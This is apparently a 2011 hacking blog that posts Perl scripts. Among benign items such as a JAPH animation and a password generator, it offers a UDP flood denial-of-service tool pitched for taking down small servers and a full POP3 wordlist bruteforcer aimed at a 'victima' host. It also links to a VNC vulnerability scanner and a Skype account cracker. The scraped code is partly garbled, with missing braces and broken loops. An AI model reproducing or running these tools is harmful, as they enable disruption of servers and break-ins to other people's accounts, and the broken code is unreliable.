Amazing JAPH terminal/cmd animation.
This code will create and animation withing the terminal which says Just Another Perl Hacker then prints out a camal, but to add to the coolness of this program the code is also in the shape of a camal. I can't show you it here because of the formatting on blogspot but view it in notepad/any ide and you'll see it.
make sure you have the terminal in fullscreen before running.
Wednesday, 4 January 2012
Saturday, 31 December 2011
DoS Tool
This denial of service tool can effective shut down a small server, of
course you need a much larger botnet to taken on google or any large
company but it's enough to play around with.
use Socket;
if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
my ($ip,$port,$size,$time);
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");
printf "-][-Attack Started-][-
-][-Aquring External IP-][-
-][-65500 Pachets Are Beeing Sent Attack Is Now Started Press Ctrl+C To Stop-][-\n";
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65500) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
perl <ip> <port> <time>
Friday, 30 December 2011
MD5 Lookup
This perl script doesn't bruteforce md5 hashes but rather uses the websites: and
To look for the hashes, i've tested and it's working but it's only 18 lines.
Download - mediafire linkuse LWP::UserAgent;
use HTTP::Cookies;
print "[+] MD5 Lookup Tool\n";
print "[+] Coded by: Saime\n";
print "\n[+] Hash: ";
$hash = <STDIN>;
chomp $hash;
$www = new LWP::UserAgent;
$site = "$hash/*";
$res = $www -> get($site) or error();
$res -> content() =~ /"result" >(.*)</ or error();
print "\n[+]\t: $1 \n\n";
$site = "$hash/*";
$res = $www -> get($site) or error();
$res -> content() =~ /<b>(.*)</ or error();
print "[+]\t: $1 \n\n";
sub error()
VNC Vulnerability Scanner
This advanced perl script is multi-threaded and will scan for vulnerabilities in VNC servers. It will also output the results to a text file as well as the terminal window. As for usage you don't enter your host as an argument, it will ask you for it when it it run.
It's over 200 lines long so here's a download link: HERE
Random Password generator.
This is an extremely simple script to generate a random password for what ever you may need it for.
This is an extremely simple script to generate a random password for what ever you may need it for.
print $randomnum;
print "\n";
POP3 Bruteforcer
This perl script can bruteforcer POP3 servers using a words list and is about 100 lines, it may not work on the big ones (google, yahoo, bing) but smaller server may not have the necessary protection.
system clear;
use Socket;
$port = 110;
$victima = $ARGV[0];
$login = $ARGV[1];
$archivo = $ARGV[2];
if(@ARGV < 3) { &jeje;exit;}
$linea = " ===============================================================\n";
$mem1 = " Hackers Venezuela\n";
$mem2 = " HV-POP3 Crack 07/06/99\n";
$mem3 = " by DoctorX email: d0ct0r_x\@\\n";
open (LISTA,"$archivo");
$count = 0 ;
while ($entrada = <LISTA>){
chop $entrada;
@nombres[$count] = $entrada ;
$total_lista = $count;
$verga = $count;
print $linea;
print $mem1;
print $mem2;
print $mem3;
print $linea;
$mem10 = " Total of Words : $count\n";
$mem11 = " Brute Force Attack ......!\n";
$mem4 = " User : $login\n";
print $mem10;
print $mem11;
print $mem4;
print " Accounts : 1 The Rest : $verga \n" ;
print $linea;
$contador = 1;
for ($y=0;$y<=$count;$y++){
$pass = @nombres[$y];
$mem9 = "user $login\n";
$mem8 = "pass $pass\n";
$NETFD = &makeconn($victima, $port);
sysread $NETFD, $message,100 or die "error Can't Read Socket Socket:$!";
sysread $NETFD, $message,100 or die "error Can't Read Socket:$!";
sysread $NETFD, $message,3 or die "error Can't Read Socket:$!";
if($message eq "+OK"){ &refrescar($count,$y,$login) ; print " Account Cracked login: $login \n"; print "
pass : \"$pass\" :-)\n"; print $linea; exit;}
if($message eq " +O"){ print " Account not Cracked login: $login \n"; print " pass : \"$pass\" :-)\n"; print
$linea; exit;}
close $NETFD;
if($contador eq "6"){ $contador = 0; &refrescar($count,$y,$login);}
print " Bad Milk \"$login\" Account not Cracked!! :-(\n";
print $linea;
sub makeconn {
my ($host, $portname, $server, $pt,$pts, $proto, $servaddr);
$host = $_[0];
$pt = $_[1];
$server = gethostbyname($host) or
die "gethostbyname: cannot locate host: $!";
$pts = getservbyport($pt, 'tcp') or
die "getservbyname: cannot get port : $!";
$proto = getprotobyname('tcp') or die " : $!";
$servaddr = sockaddr_in($pt, $server);
socket(CONNFD, PF_INET, SOCK_STREAM, $proto);
connect(CONNFD, $servaddr) or die "connect : $!";
return CONNFD;
sub jeje {
my ($sal1,$sal2,$sal3,$sal4,$sal5);
$sal1 = " Hackers Venezuela \n";
$sal2 = " HV-POP3 Crack 07/06/99\n";
$sal3 = " by DoctorX email: d0ct0r_x\@\\n";
$sal4 = " ===============================================================\n";
$sal5 = " issue : perl hv-pop3 host login words_file\n";
print $sal4;
print $sal1;
print $sal2;
print $sal3;
print $sal4;
print $sal5;
print $sal4;
sub refrescar {
my ($sal1,$sal2,$sal3,$sal4,$sal5);
system clear;
$sal1 = " Hackers Venezuela \n";
$sal2 = " HV-POP3 Crack 07/06/99\n";
$sal3 = " by DoctorX email: d0ct0r_x\@\\n";
$sal4 = " ===============================================================\n";
$total = $_[0];
$intentos = $_[1];
$account = $_[2];
$restantes = $total - $intentos;
$sal5 = " Words Probed : $intentos ";
$sal6 = " Less Words : $restantes \n";
$user = " User : $account\n";
print $sal4;
print $sal1;
print $sal2;
print $sal3;
print $sal4;
print $mem10,$mem11,$user;
print $sal5;
print $sal6;
print $sal4;
Thursday, 29 December 2011
Skype Bruteforcer
This script can potencially crack skype account but i think the security may have been inproved, still worth a read.
This script can potencially crack skype account but i think the security may have been inproved, still worth a read.
It's a bit long to post in here so i'll just offer a download.
perl 'Skype' -u userlist.txt -p passlist.txt
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